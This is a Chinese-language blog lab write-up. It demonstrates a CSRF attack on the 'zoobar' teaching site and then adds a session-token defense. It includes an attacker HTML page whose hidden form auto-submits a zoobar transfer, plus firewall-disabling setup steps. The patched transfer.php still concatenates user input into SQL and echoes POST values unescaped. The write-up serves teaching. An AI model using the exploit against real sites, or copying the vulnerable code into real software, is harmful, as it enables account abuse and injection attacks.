資訊保安實踐Lab3-CSRF&XSS&點選劫持

貓耳柯基腿發表於2021-01-05

資訊保安實踐Lab3-CSRF&XSS&點選劫持

CSRF

在zoobar網站上展示並防禦CSRF攻擊。請注意在防禦時的粒度問題,防止所有人的token都一樣;以及重新整理太快,正常操作都失敗。

配置

先在myzoo網站註冊兩個賬號 victim和attack。

攻擊者伺服器所在虛擬機器配置(10.211.55.16):

1.安裝apache2

sudo apt-get install apache2

2.關閉防火牆

sudo ufw disable

3.配置hosts

sudo vim /etc/hosts
在最後新增 
10.211.55.14  www.myzoo.com  #這裡的ip填寫myzoo伺服器的ip地址
127.0.0.1 www.attack.com 

4.編寫index.html檔案

sudo cd /var/www/html
sudo vim index.html
將下面的內容複製進去即可

index.html

<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
    <title>my profile</title>
</head>

<body>
<iframe name="it" style="display:none" width="600px" height="450px"></iframe>

<form method="POST"
      name="transferform"
      action="http://www.myzoo.com/transfer.php"
      target="it"
      id="transferform"
      style="display:none">

    <input name="zoobars" type="text" value="1" size="5">
    <input name="recipient" type="text" value="attack"> 
    <input type="hidden" name="submission" value="Send">
</form>

<img src="http://106.13.136.87:8080/101.jpeg">

<script type="text/javascript">
    form = document.getElementById("transferform");
    form.submit();
</script>

</body>
</html>

myzoo網站所在虛擬機器配置(10.211.55.14):

1.關閉防火牆

sudo ufw disable

2.配置hosts

sudo vim /etc/hosts
在最後新增 
127.0.0.1  www.myzoo.com
10.211.55.16 www.attack.com #這裡的ip填寫攻擊者伺服器的ip地址

攻擊

1.attack在賬號的profile中寫入:

<a href="http://www.attack.com"> 點選檢視我的照片哦</a>

然後點選save。

2.victim使用者去檢視attack的profile
在這裡插入圖片描述
當victim點選該連結後,就會向attack轉1個zoobars。

防禦

方法1:使用session

修改transfer.php檔案:

1.在開頭加入下面的內容

<?php
  session_start();
?>

2.修改if語句

if($_POST['submission'] && $_POST['token'] == $_SESSION['csrf'])

3.在45-47行加入下面內容

<?php
  $_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>

4.在form中新增下面的內容

<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>

修改後的transfer.php如下:

<?php
  session_start();
?>

<?php 
  require_once("includes/common.php"); 
  nav_start_outer("Transfer");
  nav_start_inner();
  if($_POST['submission'] && $_POST['token'] == $_SESSION['csrf']) {
	    $recipient = $_POST['recipient'];
    $zoobars = (int) $_POST['zoobars'];
    $sql = "SELECT Zoobars FROM Person WHERE PersonID=$user->id";
    $rs = $db->executeQuery($sql);
    $rs = mysql_fetch_array($rs);
    $sender_balance = $rs["Zoobars"] - $zoobars;
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executeQuery($sql);
    $rs = mysql_fetch_array($rs);
    $recipient_exists = $rs["PersonID"];
    if($zoobars > 0 && $sender_balance >= 0 && $recipient_exists) {
      $sql = "UPDATE Person SET Zoobars = $sender_balance " .
             "WHERE PersonID=$user->id";
      $db->executeQuery($sql);
      $sql = "SELECT Zoobars FROM Person WHERE Username='$recipient'";
      $rs = $db->executeQuery($sql);
	$rs = mysql_fetch_array($rs);
      $recipient_balance = $rs["Zoobars"] + $zoobars;
      $sql = "UPDATE Person SET Zoobars = $recipient_balance " .
             "WHERE Username='$recipient'";
      $db->executeQuery($sql);
      $result = "Sent $zoobars zoobars";
    }
    else $result = "Transfer to $recipient failed.";
  }
?>
<p><b>Balance:</b>
<span id="myZoobars">  <?php 
  $sql = "SELECT Zoobars FROM Person WHERE PersonID=$user->id";
  $rs = $db->executeQuery($sql);
  $rs = mysql_fetch_array($rs);
  $balance = $rs["Zoobars"];
  echo $balance > 0 ? $balance : 0;
?> </span> zoobars</p>

<?php
  $_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>

<form method=POST name=transferform
  action="<?php echo $_SERVER['PHP_SELF']?>">
<p>Send <input name=zoobars type=text value="<?php 
  echo $_POST['zoobars']; 
?>" size=5> zoobars</p>
<p>to <input name=recipient type=text value="<?php 
  echo $_POST['recipient']; 
?>"></p>
<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>
<input type=submit name=submission value="Send">
</form>
<span class=warning><?php 
  echo "$result"; 
?></span>
<?php 
  nav_end_inner();
?>
<script type="text/javascript" src="zoobars.js.php"></script>
<?php
  nav_end_outer(); 
?>

相關文章